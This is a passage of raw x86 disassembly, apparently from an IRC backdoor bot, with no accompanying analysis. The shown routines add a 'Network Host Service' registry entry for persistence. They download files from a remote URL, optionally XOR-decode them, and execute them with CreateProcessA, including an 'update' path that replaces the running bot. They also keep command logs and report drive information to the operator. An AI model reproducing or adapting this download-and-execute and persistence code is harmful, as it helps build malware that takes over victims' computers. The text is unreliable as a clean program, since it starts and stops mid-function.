; sub_4010CA+6D�p ...
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
lea eax, [ebp+var_10]
push eax
call ds:dword_41F028 ; GetLocalTime
mov ebx, offset dword_432FB8
mov edi, 80h
mov esi, offset dword_42EFB8
loc_401C55: ; CODE XREF: sub_401C33+3D�j
cmp byte ptr [ebx], 0
jz short loc_401C6C
push 7Fh
lea eax, [ebx+80h]
push ebx
push eax
call sub_412C40
add esp, 0Ch
loc_401C6C: ; CODE XREF: sub_401C33+25�j
sub ebx, edi
cmp ebx, esi
jge short loc_401C55
push [ebp+arg_0]
movzx eax, [ebp+var_4]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset a_2d_2d4d_2d_2d ; "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
push edi
push esi
call sub_412E0D
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_401C33 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401CA7 proc near ; CODE XREF: sub_40779B+A4�p
; sub_4078FA:loc_40A8FB�p ...
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
lea eax, [ebp+arg_4]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_80]
push 80h
push eax
call sub_412E64
lea eax, [ebp+var_80]
push eax
call sub_401C33
add esp, 14h
leave
retn
sub_401CA7 endp
; =============== S U B R O U T I N E =======================================
sub_401CD3 proc near ; CODE XREF: sub_4078FA+4512�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, offset dword_42EFB8
xor ecx, ecx
loc_401CDA: ; CODE XREF: sub_401CD3+13�j
mov [eax], cl
add eax, 80h
cmp eax, offset dword_432FB8
jl short loc_401CDA
cmp [esp+arg_C], ecx
push esi
mov esi, offset aLogsCleared_ ; "[LOGS]: Cleared."
jnz short loc_401D0A
push ecx
push [esp+8+arg_8]
push esi
push [esp+10h+arg_4]
push [esp+14h+arg_0]
call sub_4045DD
add esp, 14h
loc_401D0A: ; CODE XREF: sub_401CD3+1F�j
push esi
call sub_401C33
pop ecx
pop esi
retn
sub_401CD3 endp
; =============== S U B R O U T I N E =======================================
sub_401D13 proc near ; CODE XREF: .text:0041296D�p
arg_0 = dword ptr 4
push esi
mov esi, offset dword_42EFB8
loc_401D19: ; CODE XREF: sub_401D13+27�j
cmp byte ptr [esi], 0
jz short loc_401D2E
push [esp+4+arg_0]
push esi
call sub_405AD5
test eax, eax
pop ecx
pop ecx
jnz short loc_401D40
loc_401D2E: ; CODE XREF: sub_401D13+9�j
add esi, 80h
cmp esi, offset dword_432FB8
jl short loc_401D19
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_401D40: ; CODE XREF: sub_401D13+19�j
xor eax, eax
inc eax
pop esi
retn
sub_401D13 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D45 proc near ; DATA XREF: sub_4078FA+45C9�o
var_31C = byte ptr -31Ch
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 31Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 45h
pop ecx
mov esi, eax
lea edi, [ebp+var_11C]
rep movsd
xor edi, edi
xor edx, edx
inc edi
cmp [ebp+var_10], edx
mov [ebp+var_8], 80h
mov [ebp+var_4], edx
mov [eax+110h], edi
jnz short loc_401D98
push edx
push [ebp+var_14]
lea eax, [ebp+var_118]
push offset aLogBegin ; "[LOG]: Begin"
push eax
push [ebp+var_11C]
call sub_4045DD
add esp, 14h
loc_401D98: ; CODE XREF: sub_401D45+33�j
cmp [ebp+var_98], 0
jz short loc_401DB8
lea eax, [ebp+var_98]
push eax
call sub_412F42
test eax, eax
pop ecx
mov [ebp+var_4], eax
jz short loc_401DB8
mov [ebp+var_8], eax
loc_401DB8: ; CODE XREF: sub_401D45+5A�j
; sub_401D45+6E�j
and [ebp+arg_0], 0
mov esi, offset dword_42EFB8
loc_401DC1: ; CODE XREF: sub_401D45+D4�j
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_8]
jge short loc_401E1B
cmp byte ptr [esi], 0
jz short loc_401E0A
cmp [ebp+var_98], 0
jz short loc_401DF0
cmp [ebp+var_4], 0
jnz short loc_401DF0
lea eax, [ebp+var_98]
push eax
push esi
call sub_405AD5
test eax, eax
pop ecx
pop ecx
jz short loc_401E0A
loc_401DF0: ; CODE XREF: sub_401D45+90�j
; sub_401D45+96�j
push edi
push [ebp+var_14]
lea eax, [ebp+var_118]
push esi
push eax
push [ebp+var_11C]
call sub_4045DD
add esp, 14h
loc_401E0A: ; CODE XREF: sub_401D45+87�j
; sub_401D45+A9�j
inc [ebp+arg_0]
add esi, 80h
cmp esi, offset dword_432FB8
jl short loc_401DC1
loc_401E1B: ; CODE XREF: sub_401D45+82�j
lea eax, [ebp+var_31C]
push offset aLogListComplet ; "[LOG]: List complete."
push eax
call sub_412BB5
xor esi, esi
cmp [ebp+var_10], esi
pop ecx
pop ecx
jnz short loc_401E55
push esi
push [ebp+var_14]
lea eax, [ebp+var_31C]
push eax
lea eax, [ebp+var_118]
push eax
push [ebp+var_11C]
call sub_4045DD
add esp, 14h
loc_401E55: ; CODE XREF: sub_401D45+EE�j
lea eax, [ebp+var_31C]
push eax
call sub_401C33
push [ebp+var_18]
call sub_4111AE
pop ecx
pop ecx
push esi
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_401D45 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E73 proc near ; CODE XREF: sub_405915+1E�p
; sub_40D1EF+34A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset aNetworkHostSer ; "Network Host Service"
loc_401E83: ; CODE XREF: sub_401E73+6F�j
push ebx
lea eax, [ebp+var_4]
push eax
push ebx
push 0F003Fh
push ebx
push ebx
push ebx
push off_42A354[edi]
push dword_42A350[edi]
call dword_4334E8 ; RegCreateKeyExA
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_401EC9
lea edx, [eax+1]
loc_401EAD: ; CODE XREF: sub_401E73+3F�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_401EAD
sub eax, edx
push eax
push [ebp+arg_0]
push 1
push ebx
push esi
push [ebp+var_4]
call dword_433484 ; RegSetValueExA
jmp short loc_401ED3
; ---------------------------------------------------------------------------
loc_401EC9: ; CODE XREF: sub_401E73+35�j
push esi
push [ebp+var_4]
call dword_4334DC ; RegDeleteValueA
loc_401ED3: ; CODE XREF: sub_401E73+54�j
push [ebp+var_4]
call dword_43357C ; RegCloseKey
add edi, 8
cmp edi, 18h
jb short loc_401E83
pop edi
pop esi
pop ebx
leave
retn
sub_401E73 endp
; =============== S U B R O U T I N E =======================================
sub_401EE9 proc near ; CODE XREF: sub_401F06+109�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor ecx, ecx
cmp [esp+arg_4], ecx
jle short locret_401F05
loc_401EF5: ; CODE XREF: sub_401EE9+1A�j
mov dl, byte_42AE5C
xor [ecx+eax], dl
inc ecx
cmp ecx, [esp+arg_4]
jl short loc_401EF5
locret_401F05: ; CODE XREF: sub_401EE9+A�j
retn
sub_401EE9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401F06 proc near ; DATA XREF: sub_4078FA+287E�o
; sub_4078FA+2D24�o
var_88C = qword ptr -88Ch
var_880 = qword ptr -880h
var_810 = byte ptr -810h
var_610 = byte ptr -610h
var_410 = dword ptr -410h
var_40C = byte ptr -40Ch
var_38C = byte ptr -38Ch
var_28C = byte ptr -28Ch
var_18C = byte ptr -18Ch
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_68 = dword ptr -68h
var_5C = dword ptr -5Ch
var_3C = dword ptr -3Ch
var_38 = word ptr -38h
var_24 = byte ptr -24h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 810h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
xor ebx, ebx
push ebx
mov esi, eax
mov ecx, 0EAh
lea edi, [ebp+var_410]
rep movsd
push ebx
xor esi, esi
push ebx
inc esi
mov [eax+3A4h], esi
push ebx
lea eax, [ebp+var_38C]
push eax
push dword_4335E0
call dword_4334A8 ; InternetOpenUrlA
cmp eax, ebx
mov [ebp+var_C], eax
jz loc_4023B5
push ebx
push ebx
push 2
push ebx
push ebx
push 40000000h
lea eax, [ebp+var_28C]
push eax
call ds:dword_41F03C ; CreateFileA
cmp eax, esi
mov [ebp+var_10], eax
jnb short loc_401FCD
lea eax, [ebp+var_28C]
push eax
lea eax, [ebp+var_610]
push offset aDownloadCouldn ; "[DOWNLOAD]: Couldn't open file: %s."
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_74], ebx
jnz short loc_401FB0
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4045DD
add esp, 14h
loc_401FB0: ; CODE XREF: sub_401F06+88�j
lea eax, [ebp+var_610]
push eax
call sub_401C33
push [ebp+var_8C]
call sub_4111AE
pop ecx
jmp loc_402416
; ---------------------------------------------------------------------------
loc_401FCD: ; CODE XREF: sub_401F06+68�j
xor esi, esi
call ds:dword_41F004 ; GetTickCount
mov [ebp+var_4], eax
loc_401FD8: ; CODE XREF: sub_401F06+174�j
xor eax, eax
mov ecx, 80h
lea edi, [ebp+var_610]
rep stosd
lea eax, [ebp+arg_0]
push eax
push 200h
lea eax, [ebp+var_610]
push eax
push [ebp+var_C]
call dword_43354C ; InternetReadFile
cmp [ebp+var_78], ebx
jz short loc_402016
push [ebp+arg_0]
lea eax, [ebp+var_610]
push eax
call sub_401EE9
pop ecx
pop ecx
loc_402016: ; CODE XREF: sub_401F06+FD�j
push ebx
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_610]
push eax
push [ebp+var_10]
call ds:dword_41F038 ; WriteFile
add esi, [ebp+arg_0]
cmp [ebp+var_80], ebx
jz short loc_40203B
cmp esi, [ebp+var_80]
ja short loc_402080
loc_40203B: ; CODE XREF: sub_401F06+12E�j
mov eax, esi
shr eax, 0Ah
push eax
lea eax, [ebp+var_38C]
push eax
mov eax, [ebp+var_8C]
imul eax, 234h
add eax, offset dword_434138
cmp [ebp+var_88], 1
jz short loc_402069
push offset aDownloadFileDo ; "[DOWNLOAD]: File download: %s (%dKB tra"...
jmp short loc_40206E
; ---------------------------------------------------------------------------
loc_402069: ; CODE XREF: sub_401F06+15A�j
push offset aDownloadUpdate ; "[DOWNLOAD]: Update: %s (%dKB transferre"...
loc_40206E: ; CODE XREF: sub_401F06+161�j
push eax
call sub_412BB5
add esp, 10h
cmp [ebp+arg_0], ebx
ja loc_401FD8
loc_402080: ; CODE XREF: sub_401F06+133�j
cmp [ebp+var_80], ebx
mov [ebp+var_8], 1
jz short loc_4020D5
cmp esi, [ebp+var_80]
jz short loc_4020D5
push [ebp+var_80]
lea eax, [ebp+var_610]
push esi
push offset aDownloadFilesi ; "[DOWNLOAD]: Filesize is incorrect: (%d "...
push eax
mov [ebp+var_8], ebx
call sub_412BB5
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4045DD
lea eax, [ebp+var_610]
push eax
call sub_401C33
add esp, 28h
loc_4020D5: ; CODE XREF: sub_401F06+184�j
; sub_401F06+189�j
call ds:dword_41F004 ; GetTickCount
sub eax, [ebp+var_4]
xor edx, edx
mov ecx, 3E8h
div ecx
xor edx, edx
push [ebp+var_10]
mov ecx, eax
inc ecx
mov eax, esi
div ecx
mov edi, eax
call ds:dword_41F034 ; CloseHandle
cmp [ebp+var_8], ebx
jz loc_402402
cmp [ebp+var_88], 1
jz loc_4022C6
test edi, edi
mov [ebp+var_4], edi
fild [ebp+var_4]
jge short loc_402121
fadd ds:dbl_41FAD8
loc_402121: ; CODE XREF: sub_401F06+213�j
test esi, esi
fmul ds:dbl_41FAD0
push ecx
push ecx
fstp [esp+880h+var_880]
lea eax, [ebp+var_28C]
mov [ebp+var_4], esi
fild [ebp+var_4]
push eax
jge short loc_402143
fadd ds:dbl_41FAD8
loc_402143: ; CODE XREF: sub_401F06+235�j
fmul ds:dbl_41FAD0
push ecx
push ecx
lea eax, [ebp+var_610]
fstp [esp+88Ch+var_88C]
push offset aDownloadDownlo ; "[DOWNLOAD]: Downloaded %.1f KB to %s @ "...
push eax
call sub_412BB5
add esp, 1Ch
cmp [ebp+var_74], ebx
jnz short loc_402187
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4045DD
add esp, 14h
loc_402187: ; CODE XREF: sub_401F06+25F�j
lea eax, [ebp+var_610]
push eax
call sub_401C33
cmp [ebp+var_84], 1
pop ecx
jnz loc_402402
cmp [ebp+var_74], ebx
jnz short loc_4021F1
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_28C]
push eax
lea eax, [ebp+var_610]
push offset aDownloadOpenni ; "[DOWNLOAD]: Openning: %s %s."
push eax
call sub_412BB5
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4045DD
lea eax, [ebp+var_610]
push eax
call sub_401C33
add esp, 28h
loc_4021F1: ; CODE XREF: sub_401F06+29E�j
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
push 11h
xor eax, eax
pop ecx
lea edi, [ebp+var_68]
rep stosd
mov ecx, 80h
lea edi, [ebp+var_810]
mov [ebp+var_5C], (offset asc_41FA74+2)
mov [ebp+var_68], 44h
mov [ebp+var_3C], 1
mov [ebp+var_38], bx
rep stosd
loc_40222A: ; CODE XREF: sub_401F06+335�j
mov cl, [ebp+eax+var_28C]
mov [ebp+eax+var_810], cl
inc eax
cmp cl, bl
jnz short loc_40222A
lea edi, [ebp+var_810]
dec edi
loc_402244: ; CODE XREF: sub_401F06+344�j
mov al, [edi+1]
inc edi
cmp al, bl
jnz short loc_402244
mov esi, offset asc_41FA74 ; " "
lea eax, [ebp+var_18C]
movsw
mov edx, eax
loc_40225B: ; CODE XREF: sub_401F06+35A�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_40225B
lea edi, [ebp+var_810]
sub eax, edx
dec edi
loc_40226B: ; CODE XREF: sub_401F06+36B�j
mov cl, [edi+1]
inc edi
cmp cl, bl
jnz short loc_40226B
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_68]
push eax
push ebx
push ebx
push 30h
push ebx
push ebx
push ebx
lea eax, [ebp+var_810]
push eax
and ecx, 3
push ebx
rep movsb
call ds:dword_41F030 ; CreateProcessA
cmp eax, 1
lea eax, [ebp+var_810]
push eax
lea eax, [ebp+var_610]
jnz short loc_4022BC
push offset aDownloadApplic ; "[DOWNLOAD]: Application succesfully exe"...
jmp loc_4023C7
; ---------------------------------------------------------------------------
loc_4022BC: ; CODE XREF: sub_401F06+3AA�j
push offset aDownloadExecut ; "[DOWNLOAD]: Execution failed: Error exe"...
jmp loc_4023C7
; ---------------------------------------------------------------------------
loc_4022C6: ; CODE XREF: sub_401F06+205�j
test edi, edi
mov [ebp+var_4], edi
fild [ebp+var_4]
jge short loc_4022D6
fadd ds:dbl_41FAD8
loc_4022D6: ; CODE XREF: sub_401F06+3C8�j
test esi, esi
fmul ds:dbl_41FAD0
push ecx
push ecx
fstp [esp+880h+var_880]
lea eax, [ebp+var_28C]
mov [ebp+var_4], esi
fild [ebp+var_4]
push eax
jge short loc_4022F8
fadd ds:dbl_41FAD8
loc_4022F8: ; CODE XREF: sub_401F06+3EA�j
fmul ds:dbl_41FAD0
push ecx
push ecx
lea eax, [ebp+var_610]
fstp [esp+88Ch+var_88C]
push offset aDownloadDown_0 ; "[DOWNLOAD]: Downloaded %.1fKB to %s @ %"...
push eax
call sub_412BB5
add esp, 1Ch
cmp [ebp+var_74], ebx
jnz short loc_40233C
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4045DD
add esp, 14h
loc_40233C: ; CODE XREF: sub_401F06+414�j
lea eax, [ebp+var_610]
push eax
call sub_401C33
xor eax, eax
pop ecx
lea edi, [ebp+var_24]
stosd
stosd
push 11h
stosd
pop ecx
stosd
xor eax, eax
lea edi, [ebp+var_68]
rep stosd
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_68]
push eax
push ebx
push ebx
push 30h
push ebx
push ebx
push ebx
lea eax, [ebp+var_28C]
xor esi, esi
push eax
inc esi
push ebx
mov [ebp+var_5C], (offset asc_41FA74+2)
mov [ebp+var_68], 44h
mov [ebp+var_3C], esi
mov [ebp+var_38], bx
call ds:dword_41F030 ; CreateProcessA
cmp eax, esi
jnz short loc_4023A7
call dword_4335B8 ; WSACleanup
call sub_405915
push ebx
call ds:dword_41F02C ; ExitProcess
loc_4023A7: ; CODE XREF: sub_401F06+48D�j
lea eax, [ebp+var_28C]
push eax
push offset aDownloadUpda_0 ; "[DOWNLOAD]: Update failed: Error execut"...
jmp short loc_4023C1
; ---------------------------------------------------------------------------
loc_4023B5: ; CODE XREF: sub_401F06+45�j
lea eax, [ebp+var_38C]
push eax
push offset aDownloadBadUrl ; "[DOWNLOAD]: Bad URL, or DNS Error: %s."
loc_4023C1: ; CODE XREF: sub_401F06+4AD�j
lea eax, [ebp+var_610]
loc_4023C7: ; CODE XREF: sub_401F06+3B1�j
; sub_401F06+3BB�j
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_74], ebx
jnz short loc_4023F5
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4045DD
add esp, 14h
loc_4023F5: ; CODE XREF: sub_401F06+4CD�j
lea eax, [ebp+var_610]
push eax
call sub_401C33
pop ecx
loc_402402: ; CODE XREF: sub_401F06+1F8�j
; sub_401F06+295�j
push [ebp+var_C]
call dword_4334FC ; InternetCloseHandle
push [ebp+var_8C]
call sub_4111AE
loc_402416: ; CODE XREF: sub_401F06+C2�j
pop ecx
push ebx
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_401F06 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40241F proc near ; CODE XREF: sub_4078FA+4C27�p
; sub_4078FA+4D7A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_4134AF
pop ecx
pop ecx
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_40241F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402439 proc near ; CODE XREF: sub_40253D+66�p
; sub_40253D+97�p ...
var_40 = byte ptr -40h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40h
and [ebp+var_4], 0
push esi
push edi
push 0Ch
mov esi, offset dword_432FB8
pop ecx
xor eax, eax
mov edi, esi
rep stosd
stosw
lea edi, [ebp+var_40]
push ebx
loc_402459: ; CODE XREF: sub_402439+50�j
; sub_402439+56�j
push 0
push 0Ah
push [ebp+arg_4]
push [ebp+arg_0]
call sub_413500
add cl, 30h
mov [edi], cl
inc edi
mov [ebp+arg_0], eax
or eax, edx
mov [ebp+var_8], ebx
mov [ebp+arg_4], edx
jz short loc_402491
inc [ebp+var_4]
mov eax, [ebp+var_4]
push 3
cdq
pop ecx
idiv ecx
test edx, edx
jnz short loc_402459
mov byte ptr [edi], 2Ch
inc edi
jmp short loc_402459
; ---------------------------------------------------------------------------
loc_402491: ; CODE XREF: sub_402439+40�j
mov eax, esi
pop ebx
jmp short loc_40249B
; ---------------------------------------------------------------------------
loc_402496: ; CODE XREF: sub_402439+68�j
mov cl, [edi]
mov [eax], cl
inc eax
loc_40249B: ; CODE XREF: sub_402439+5B�j
dec edi
lea ecx, [ebp+var_40]
cmp edi, ecx
jnb short loc_402496
and byte ptr [eax], 0
pop edi
mov eax, esi
pop esi
leave
retn
sub_402439 endp
; =============== S U B R O U T I N E =======================================
sub_4024AC proc near ; CODE XREF: sub_402658+3E�p
; sub_402658+74�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_43342C ; GetDriveTypeA
sub eax, 0
jz short loc_4024EF
dec eax
jz short loc_4024E9
dec eax
dec eax
jz short loc_4024E3
dec eax
jz short loc_4024DD
dec eax
jz short loc_4024D7
dec eax
jz short loc_4024D1
mov eax, offset a? ; "?"
retn
; ---------------------------------------------------------------------------
loc_4024D1: ; CODE XREF: sub_4024AC+1D�j
mov eax, offset aRam ; "RAM"
retn
; ---------------------------------------------------------------------------
loc_4024D7: ; CODE XREF: sub_4024AC+1A�j
mov eax, offset aCdrom ; "Cdrom"
retn
; ---------------------------------------------------------------------------
loc_4024DD: ; CODE XREF: sub_4024AC+17�j
mov eax, offset aNetwork ; "Network"
retn
; ---------------------------------------------------------------------------
loc_4024E3: ; CODE XREF: sub_4024AC+14�j
mov eax, offset aDisk ; "Disk"
retn
; ---------------------------------------------------------------------------
loc_4024E9: ; CODE XREF: sub_4024AC+10�j
mov eax, offset aInvalid ; "Invalid"
retn
; ---------------------------------------------------------------------------
loc_4024EF: ; CODE XREF: sub_4024AC+D�j
mov eax, offset aUnknown ; "Unknown"
retn
sub_4024AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4024F5 proc near ; CODE XREF: sub_40253D+12�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
or eax, 0FFFFFFFFh
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov eax, dword_43349C
test eax, eax
jz short loc_40252A
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_4]
call eax ; GetDiskFreeSpaceExA
loc_40252A: ; CODE XREF: sub_4024F5+22�j
mov eax, [ebp+arg_0]
push esi
push edi
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_4024F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40253D proc near ; CODE XREF: sub_402658+17�p
; sub_40FE1F+1BD�p
var_1B0 = byte ptr -1B0h
var_130 = byte ptr -130h
var_B0 = byte ptr -0B0h
var_30 = byte ptr -30h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1B0h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_30]
push eax
call sub_4024F5
pop ecx
pop ecx
push 6
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jz loc_402615
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jz loc_402615
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jz loc_402615
push ebx
push 0
mov ebx, 400h
push ebx
push [ebp+var_14]
push [ebp+var_18]
call sub_4135A0
push edx
push eax
call sub_402439
push eax
mov edi, offset aSkb ; "%sKB"
push edi
mov esi, 80h
lea eax, [ebp+var_1B0]
push esi
push eax
call sub_412E0D
add esp, 18h
push 0
push ebx
push [ebp+var_C]
push [ebp+var_10]
call sub_4135A0
push edx
push eax
call sub_402439
push eax
push edi
lea eax, [ebp+var_130]
push esi
push eax
call sub_412E0D
add esp, 18h
push 0
push ebx
push [ebp+var_4]
push [ebp+var_8]
call sub_4135A0
push edx
push eax
call sub_402439
push eax
push edi
lea eax, [ebp+var_B0]
push esi
push eax
call sub_412E0D
add esp, 18h
pop ebx
jmp short loc_402644
; ---------------------------------------------------------------------------
loc_402615: ; CODE XREF: sub_40253D+2C�j
; sub_40253D+3B�j ...
mov esi, offset aFailed ; "failed"
lea eax, [ebp+var_1B0]
push esi
push eax
call sub_412BB5
lea eax, [ebp+var_130]
push esi
push eax
call sub_412BB5
lea eax, [ebp+var_B0]
push esi
push eax
call sub_412BB5
add esp, 18h
loc_402644: ; CODE XREF: sub_40253D+D6�j
mov eax, [ebp+arg_0]
push 60h
pop ecx
lea esi, [ebp+var_1B0]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_40253D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402658 proc near ; CODE XREF: sub_402717+B�j
; sub_402717+51�p
var_500 = byte ptr -500h
var_380 = byte ptr -380h
var_180 = byte ptr -180h
var_100 = byte ptr -100h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 500h
push ebx
mov ebx, [ebp+arg_C]
push esi
push edi
lea eax, [ebp+var_500]
push ebx
push eax
call sub_40253D
pop ecx
pop ecx
push 60h
pop ecx
mov esi, eax
lea edi, [ebp+var_180]
rep movsd
push 7
mov edi, offset aFailed ; "failed"
lea esi, [ebp+var_80]
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_4026B8
push ebx
push ebx
call sub_4024AC
pop ecx
push eax
push offset aMainSDriveSFai ; "[MAIN]: %s Drive (%s): Failed to stat, "...
lea eax, [ebp+var_380]
push 200h
push eax
call sub_412E0D
add esp, 14h
jmp short loc_4026EC
; ---------------------------------------------------------------------------
loc_4026B8: ; CODE XREF: sub_402658+3A�j
lea eax, [ebp+var_180]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_80]
push eax
push ebx
push ebx
call sub_4024AC
pop ecx
push eax
push offset aMainSDriveSSTo ; "[MAIN]: %s Drive (%s): %s total, %s fre"...
lea eax, [ebp+var_380]
push 200h
push eax
call sub_412E0D
add esp, 20h
loc_4026EC: ; CODE XREF: sub_402658+5E�j
push 1
push [ebp+arg_8]
lea eax, [ebp+var_380]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
lea eax, [ebp+var_380]
push eax
call sub_401C33
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_402658 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402717 proc near ; CODE XREF: sub_4078FA+4268�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
xor eax, eax
cmp [ebp+arg_C], eax
jz short loc_402727
pop ebp
jmp sub_402658
; ---------------------------------------------------------------------------
loc_402727: ; CODE XREF: sub_402717+8�j
push ebx
push esi
push eax
push eax
call dword_43353C ; GetLogicalDriveStringsA
lea esi, [eax+2]
push esi
call sub_41344D
pop ecx
mov ebx, eax
push ebx
push esi
mov [ebp+arg_C], ebx
call dword_43353C ; GetLogicalDriveStringsA
cmp byte ptr [ebx], 0
jz short loc_40278A
push edi
loc_40274E: ; CODE XREF: sub_402717+6D�j
push 4
mov edi, offset aA ; "A:\\"
mov esi, ebx
pop ecx
xor eax, eax
repe cmpsb
jz short loc_402770
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_402658
add esp, 10h
loc_402770: ; CODE XREF: sub_402717+45�j
mov eax, ebx
lea edx, [eax+1]
loc_402775: ; CODE XREF: sub_402717+63�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_402775
sub eax, edx
lea ebx, [ebx+eax+1]
cmp [ebx], cl
jnz short loc_40274E
mov ebx, [ebp+arg_C]
pop edi
loc_40278A: ; CODE XREF: sub_402717+34�j
push ebx
call sub_412FE4
pop ecx
pop esi
pop ebx
pop ebp
retn
sub_402717 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402795 proc near ; DATA XREF: sub_40D1EF+14�o
var_2B8 = dword ptr -2B8h
var_25C = byte ptr -25Ch
